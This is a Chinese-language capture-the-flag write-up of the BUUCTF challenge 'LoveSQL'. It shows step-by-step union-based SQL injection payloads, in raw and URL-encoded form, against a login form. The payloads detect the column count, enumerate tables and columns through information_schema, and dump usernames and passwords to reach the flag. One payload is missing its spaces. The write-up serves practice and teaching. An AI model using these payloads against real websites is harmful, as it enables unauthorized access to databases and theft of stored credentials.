[极客大挑战 2019]LoveSQL
1
[目标]
Sql注入
[环境]
Buuctf
[工具]
浏览器
[分析]
1.在账号密码框分别试数字或字母,引号都是返回一个结果
2.试一试万能密码
3.查询列数
Payload:
username=1’ order by 3#&password=1
Url:1%27%20order%20by%203%23&password=1
Payload:
username=1’ order by 4#&password=1
Url:
username=1%27%20order%20by%204%23&password=1
由此可知,总共有三列
4.查询数据库
Payload:username=1’union select 1,database(),version()#&password=1
Url:username=1%27union%20select%201,database(),version()%23&password=1
5.查询表名
Payload:
username=1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#&password=1
Url:
username=1%27%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23&password=1
得到geekuser,l0ve1ysq1两个表
6.查找表中的列
Payload:
username=1’union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database()#&password=1
Url:
username=1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%23&password=1
得到id,username,password,id,username,password这些列
7.查找l0ve1ysq1表中的值
Payload:
username=1’unionselect1,2,group_concat(id,username,password) from l0ve1ysq1#&password=1
Url:
username=1%27union%20select%201,2,group_concat(id,username,password)%20from%20l0ve1ysq1%23&password=1
打开源码
得到flag
查询geekuser表中的值
Payload:
username=1’union select 1,2,group_concat(id,username,password) from geekuser#&p
assword=1
Url:
username=1%27union%20select%201,2,group_concat(id,username,password)%20from%20geekuser%23&password=1
